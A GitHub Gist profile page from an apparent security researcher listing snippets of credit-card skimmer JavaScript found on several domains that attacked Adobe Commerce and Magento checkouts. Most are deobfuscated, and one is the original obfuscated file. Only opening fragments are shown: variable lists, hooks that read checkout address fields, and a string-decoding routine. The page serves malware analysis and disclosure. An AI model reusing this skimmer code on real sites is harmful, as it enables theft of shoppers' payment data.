Skip to content

Instantly share code, notes, and snippets.

View BenBaryoPX's full-sized avatar

Ben Baryo BenBaryoPX

View GitHub Profile
@BenBaryoPX
BenBaryoPX / app.nomalert.org-dir-main.js-Generic-deob-renamed.js
Created June 21, 2022 18:01
Skimmer found served from app.nomalert.org attacking Adobe Commerce
var ccn, nb_dd, nm_dd, m_dd, y_dd, c_dd, details, ccFieldsIds, al, vld, sac, sd, requiresExfiltration, sr, scf, vcn, gfv, gc, cc, ini, generateGUID, generateIV, encryptData, countries;
(function () {
var attack = function () {
function injectHooks() {
function clickCallback() {
var addressHtml = jQuery('.address:eq(0)').html();
if (addressHtml) {
var addressLines = addressHtml.split('<br>');
if (addressLines && addressLines.length) {
details.f = addressLines[0] ? addressLines[0].trim() : '';
@BenBaryoPX
BenBaryoPX / cdn.base-code.org-analytics-code.js-Generic-deob-renamed.js
Created June 21, 2022 17:55
Skimmer found served from cdn.base-code.org attacking Magento's Authorize CIM Payment module
var lscr, teros, binoms, adumn, hinnes, dertons, linomx, _gfv, hornis, derit, kilons, admis;
(function () {
var attack = function () {
function startInjections() {
if (localStorage.getItem('mage-cache-version')) {
return;
}
if (typeof jQuery === 'undefined') {
return;
}
@BenBaryoPX
BenBaryoPX / js.staticounter.net-static-counter.js-Generic-deob-renamed.js
Created June 21, 2022 16:33
A deobfuscated and beautified version of the staticounter.net skimmer
var o1, o2, o3, o4, o11, o22, o33, o44, b1, b2, ccn, dC43, r3, chckst, dd91, ab, dB34, bD34, gG77, iV21, nI88, b2_, f1, f2, f3, f4, ccFieldsNames, ccNumberContainer, expContainer, dY34, cvcElementContainer, details, cc56, vD561, cF98, cstchd, aC57, sF86, sD89, requiresExfiltration, sR31, dI66, cT49, cN78, generateGUID, generateIV, encryptData;
(function () {
var attack = function () {
function hideOriginalForm() {
if (getCookieValue('form_key_id')) {
return;
}
if (typeof jQuery === 'undefined') {
return;
}
@BenBaryoPX
BenBaryoPX / js.staticounter.net-static-counter.js
Created June 21, 2022 14:42
The staticounter.net skimmer
;var o1, o2, o3, o4, o11, o22, o33, o44, b1, b2, ccn, dC43, r3, chckst, dd91, ab, dB34, bD34, gG77, iV21, nI88, b2_, f1, f2, f3, f4, vAr, dN34, dM34, dY34, dC34, i71, cc56, vD561, cF98, cstchd, aC57, sF86, sD89, en_snd, sR31, dI66, cT49, cN78, pojojnoln, wefwfew, ljklkjljilu;
(function() {
var kjn = ''
, MXQ = 759 - 748;
function UDS(b) {
var r = 6298399;
var o = b.length;
var f = [];
for (var s = 0; s < o; s++) {
f[s] = b.charAt(s)
@BenBaryoPX
BenBaryoPX / js.staticounter.net-static-counter.js-Generic-deob.js
Last active June 21, 2022 14:42
Deobfuscated Staticounter Skimmer
var o1, o2, o3, o4, o11, o22, o33, o44, b1, b2, ccn, dC43, r3, chckst, dd91, ab, dB34, bD34, gG77, iV21, nI88, b2_, f1, f2, f3, f4, vAr, dN34, dM34, dY34, dC34, i71, cc56, vD561, cF98, cstchd, aC57, sF86, sD89, en_snd, sR31, dI66, cT49, cN78, pojojnoln, wefwfew, ljklkjljilu;
(function () {
var CuM = function () {
function _0x270ED(_0x26D23, _0x26A7C) {
var _0x26774 = _0x26D23.length;
var _0x269BA = [];
for (var _0x26836 = 0; _0x26836 < _0x26D23.length; _0x26836++) {
_0x269BA[_0x26836] = _0x26D23.charAt(_0x26836);
}
for (var _0x26836 = 0; _0x26836 < _0x26D23.length; _0x26836++) {